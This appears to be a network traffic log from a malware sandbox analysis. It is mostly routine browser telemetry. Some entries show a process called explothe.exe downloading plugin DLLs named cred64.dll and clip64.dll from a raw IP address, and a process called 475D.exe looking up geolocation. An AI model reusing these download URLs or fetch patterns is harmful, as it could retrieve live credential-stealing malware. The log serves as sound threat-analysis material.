                                                                                                                content-type: application/json
                                                                                                                server: Microsoft-HTTPAPI/2.0
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                time-delta-millis: 1664
                                                                                                                access-control-allow-headers: time-delta-millis
                                                                                                                access-control-allow-methods: POST
                                                                                                                access-control-allow-credentials: true
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                access-control-expose-headers: time-delta-millis
                                                                                                                date: Thu, 12 Oct 2023 20:48:37 GMT
                                                                                                              • flag-us
                                                                                                                POST
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.208.16.89:443
                                                                                                                Request
                                                                                                                POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
                                                                                                                host: browser.events.data.microsoft.com
                                                                                                                content-length: 2057
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                upload-time: 1697143719317
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                client-version: 1DS-Web-JS-3.2.14
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                time-delta-to-apply-millis: 2554
                                                                                                                content-type: application/x-json-stream
                                                                                                                cache-control: no-cache, no-store
                                                                                                                apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
                                                                                                                client-id: NO_AUTH
                                                                                                                accept: */*
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
                                                                                                                cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 24
                                                                                                                content-type: application/json
                                                                                                                server: Microsoft-HTTPAPI/2.0
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                time-delta-millis: 2237
                                                                                                                access-control-allow-headers: time-delta-millis
                                                                                                                access-control-allow-methods: POST
                                                                                                                access-control-allow-credentials: true
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                access-control-expose-headers: time-delta-millis
                                                                                                                date: Thu, 12 Oct 2023 20:48:41 GMT
                                                                                                              • flag-us
                                                                                                                POST
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.208.16.89:443
                                                                                                                Request
                                                                                                                POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
                                                                                                                host: browser.events.data.microsoft.com
                                                                                                                content-length: 1908
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                upload-time: 1697143742290
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                client-version: 1DS-Web-JS-3.2.14
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                time-delta-to-apply-millis: use-collector-delta
                                                                                                                content-type: application/x-json-stream
                                                                                                                cache-control: no-cache, no-store
                                                                                                                apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
                                                                                                                client-id: NO_AUTH
                                                                                                                accept: */*
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
                                                                                                                cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 24
                                                                                                                content-type: application/json
                                                                                                                server: Microsoft-HTTPAPI/2.0
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                time-delta-millis: 2011
                                                                                                                access-control-allow-headers: time-delta-millis
                                                                                                                access-control-allow-methods: POST
                                                                                                                access-control-allow-credentials: true
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                access-control-expose-headers: time-delta-millis
                                                                                                                date: Thu, 12 Oct 2023 20:49:03 GMT
                                                                                                              • flag-us
                                                                                                                POST
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.208.16.89:443
                                                                                                                Request
                                                                                                                POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
                                                                                                                host: browser.events.data.microsoft.com
                                                                                                                content-length: 2058
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                upload-time: 1697143744291
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                client-version: 1DS-Web-JS-3.2.14
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                time-delta-to-apply-millis: 2011
                                                                                                                content-type: application/x-json-stream
                                                                                                                cache-control: no-cache, no-store
                                                                                                                apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
                                                                                                                client-id: NO_AUTH
                                                                                                                accept: */*
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
                                                                                                                cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 24
                                                                                                                content-type: application/json
                                                                                                                server: Microsoft-HTTPAPI/2.0
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                time-delta-millis: 1635
                                                                                                                access-control-allow-headers: time-delta-millis
                                                                                                                access-control-allow-methods: POST
                                                                                                                access-control-allow-credentials: true
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                access-control-expose-headers: time-delta-millis
                                                                                                                date: Thu, 12 Oct 2023 20:49:05 GMT
                                                                                                              • flag-us
                                                                                                                POST
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.208.16.89:443
                                                                                                                Request
                                                                                                                POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
                                                                                                                host: browser.events.data.microsoft.com
                                                                                                                content-length: 2096
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                upload-time: 1697143751288
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                client-version: 1DS-Web-JS-3.2.14
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                time-delta-to-apply-millis: 2011
                                                                                                                content-type: application/x-json-stream
                                                                                                                cache-control: no-cache, no-store
                                                                                                                apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
                                                                                                                client-id: NO_AUTH
                                                                                                                accept: */*
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
                                                                                                                cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 24
                                                                                                                content-type: application/json
                                                                                                                server: Microsoft-HTTPAPI/2.0
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                time-delta-millis: 1644
                                                                                                                access-control-allow-headers: time-delta-millis
                                                                                                                access-control-allow-methods: POST
                                                                                                                access-control-allow-credentials: true
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                access-control-expose-headers: time-delta-millis
                                                                                                                date: Thu, 12 Oct 2023 20:49:12 GMT
                                                                                                              • flag-us
                                                                                                                POST
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.208.16.89:443
                                                                                                                Request
                                                                                                                POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
                                                                                                                host: browser.events.data.microsoft.com
                                                                                                                content-length: 1942
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                upload-time: 1697143753549
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                client-version: 1DS-Web-JS-3.2.14
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                time-delta-to-apply-millis: 2011
                                                                                                                content-type: application/x-json-stream
                                                                                                                cache-control: no-cache, no-store
                                                                                                                apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
                                                                                                                client-id: NO_AUTH
                                                                                                                accept: */*
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
                                                                                                                cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 24
                                                                                                                content-type: application/json
                                                                                                                server: Microsoft-HTTPAPI/2.0
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                time-delta-millis: 1648
                                                                                                                access-control-allow-headers: time-delta-millis
                                                                                                                access-control-allow-methods: POST
                                                                                                                access-control-allow-credentials: true
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                access-control-expose-headers: time-delta-millis
                                                                                                                date: Thu, 12 Oct 2023 20:49:14 GMT
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                89.16.208.104.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                89.16.208.104.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://api.ip.sb/geoip
                                                                                                                475D.exe
                                                                                                                Remote address:
                                                                                                                104.26.12.31:443
                                                                                                                Request
                                                                                                                GET /geoip HTTP/1.1
                                                                                                                Host: api.ip.sb
                                                                                                                Connection: Keep-Alive
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Date: Thu, 12 Oct 2023 20:48:39 GMT
                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                Content-Length: 285
                                                                                                                Connection: keep-alive
                                                                                                                vary: Accept-Encoding
                                                                                                                vary: Accept-Encoding
                                                                                                                Cache-Control: no-cache
                                                                                                                access-control-allow-origin: *
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BwdVsFDpuZghdiwrWAgtxPENfXDfD3aVhGtz%2FlXveHXp9VE5gzmmy6%2BwjzTAVTraIEpDo1bzXCBhHIyN8ADgkSPEHB8K%2BCiIMhzKCVq%2FAzfQe%2Flna%2BnwjHGKjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 81523477acc31cc6-AMS
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                              • flag-fi
                                                                                                                GET
                                                                                                                http://77.91.124.1/theme/Plugins/cred64.dll
                                                                                                                explothe.exe
                                                                                                                Remote address:
                                                                                                                77.91.124.1:80
                                                                                                                Request
                                                                                                                GET /theme/Plugins/cred64.dll HTTP/1.1
                                                                                                                Host: 77.91.124.1
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:48:41 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 273
                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                              • flag-fi
                                                                                                                GET
                                                                                                                http://77.91.124.1/theme/Plugins/clip64.dll
                                                                                                                explothe.exe
                                                                                                                Remote address:
                                                                                                                77.91.124.1:80
                                                                                                                Request
                                                                                                                GET /theme/Plugins/clip64.dll HTTP/1.1
                                                                                                                Host: 77.91.124.1
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Date: Thu, 12 Oct 2023 20:48:41 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
                                                                                                                ETag: "16400-60691507c5cc0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 91136
                                                                                                                Content-Type: application/x-msdos-program
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                play.google.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                play.google.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                play.google.com
                                                                                                                IN A
                                                                                                                142.251.36.14
                                                                                                              • flag-nl
                                                                                                                OPTIONS
                                                                                                                https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                142.251.36.14:443
                                                                                                                Request
                                                                                                                OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
                                                                                                                host: play.google.com
                                                                                                                accept: */*
                                                                                                                access-control-request-method: POST
                                                                                                                access-control-request-headers: x-goog-authuser
                                                                                                                origin: https://accounts.google.com
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://accounts.google.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                14.36.251.142.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                14.36.251.142.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                14.36.251.142.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                ams15s44-in-f141e100net
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                137.71.105.51.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                137.71.105.51.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                197.98.23.89.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                197.98.23.89.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                197.98.23.89.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                197.98.23.89.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                tse1.mm.bing.net
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                tse1.mm.bing.net
                                                                                                                IN A
                                                                                                                Response
                                                                                                                tse1.mm.bing.net
                                                                                                                IN CNAME
                                                                                                                mm-mm.bing.net.trafficmanager.net
                                                                                                                mm-mm.bing.net.trafficmanager.net
                                                                                                                IN CNAME
                                                                                                                dual-a-0001.a-msedge.net
                                                                                                                dual-a-0001.a-msedge.net
                                                                                                                IN A
                                                                                                                204.79.197.200
                                                                                                                dual-a-0001.a-msedge.net
                                                                                                                IN A
                                                                                                                13.107.21.200
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                tse1.mm.bing.net
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                tse1.mm.bing.net
                                                                                                                IN A
                                                                                                                Response
                                                                                                                tse1.mm.bing.net
                                                                                                                IN CNAME
                                                                                                                mm-mm.bing.net.trafficmanager.net
                                                                                                                mm-mm.bing.net.trafficmanager.net
                                                                                                                IN CNAME
                                                                                                                dual-a-0001.a-msedge.net
                                                                                                                dual-a-0001.a-msedge.net
                                                                                                                IN A
                                                                                                                204.79.197.200
                                                                                                                dual-a-0001.a-msedge.net
                                                                                                                IN A
                                                                                                                13.107.21.200
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317301145_1Y8CXK45BT2OHNQQQ&pid=21.2&w=1920&h=1080&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317301145_1Y8CXK45BT2OHNQQQ&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                cache-control: public, max-age=2592000
                                                                                                                content-length: 300661
                                                                                                                content-type: image/jpeg
                                                                                                                x-cache: TCP_HIT
                                                                                                                access-control-allow-origin: *
                                                                                                                access-control-allow-headers: *
                                                                                                                access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                timing-allow-origin: *
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                x-msedge-ref: Ref A: EC4EDF2D60534A69B2F3FD7B8F8FD6A8 Ref B: BRU30EDGE0908 Ref C: 2023-10-12T20:49:16Z
                                                                                                                date: Thu, 12 Oct 2023 20:49:16 GMT
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317301554_133DWC45UAH2W18HX&pid=21.2&w=1080&h=1920&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317301554_133DWC45UAH2W18HX&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                cache-control: public, max-age=2592000
                                                                                                                content-length: 262756
                                                                                                                content-type: image/jpeg
                                                                                                                x-cache: TCP_HIT
                                                                                                                access-control-allow-origin: *
                                                                                                                access-control-allow-headers: *
                                                                                                                access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                timing-allow-origin: *
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                x-msedge-ref: Ref A: 7880DC989F4D49FFA96F5638F6EFC9E5 Ref B: BRU30EDGE0908 Ref C: 2023-10-12T20:49:16Z
                                                                                                                date: Thu, 12 Oct 2023 20:49:16 GMT
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317301168_16G64C18QUW861YM2&pid=21.2&w=1920&h=1080&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317301168_16G64C18QUW861YM2&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                cache-control: public, max-age=2592000
                                                                                                                content-length: 535868
                                                                                                                content-type: image/jpeg
                                                                                                                x-cache: TCP_HIT
                                                                                                                access-control-allow-origin: *
                                                                                                                access-control-allow-headers: *
                                                                                                                access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                timing-allow-origin: *
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                x-msedge-ref: Ref A: D1DFF0BD5EC0438EAF3F3A1B610C8DA3 Ref B: BRU30EDGE0908 Ref C: 2023-10-12T20:49:16Z
                                                                                                                date: Thu, 12 Oct 2023 20:49:16 GMT
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317301577_1B5OIQ9XH8JLMH3HW&pid=21.2&w=1080&h=1920&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317301577_1B5OIQ9XH8JLMH3HW&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                cache-control: public, max-age=2592000
                                                                                                                content-length: 450187
                                                                                                                content-type: image/jpeg
                                                                                                                x-cache: TCP_HIT
                                                                                                                access-control-allow-origin: *
                                                                                                                access-control-allow-headers: *
                                                                                                                access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                timing-allow-origin: *
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                x-msedge-ref: Ref A: 3DA6737965054AC282B349CAC15869B6 Ref B: BRU30EDGE0908 Ref C: 2023-10-12T20:49:16Z
                                                                                                                date: Thu, 12 Oct 2023 20:49:16 GMT
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317300969_156V9EGCLLGG8U764&pid=21.2&w=1920&h=1080&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317300969_156V9EGCLLGG8U764&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                cache-control: public, max-age=2592000
                                                                                                                content-length: 379725
                                                                                                                content-type: image/jpeg
                                                                                                                x-cache: TCP_HIT
                                                                                                                access-control-allow-origin: *
                                                                                                                access-control-allow-headers: *
                                                                                                                access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                timing-allow-origin: *
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                x-msedge-ref: Ref A: 6A137641768F4658ADCF71BB1C5C2B33 Ref B: BRU30EDGE0908 Ref C: 2023-10-12T20:49:16Z
                                                                                                                date: Thu, 12 Oct 2023 20:49:16 GMT
                                                                                                              • flag-us
                                                                                                                GET
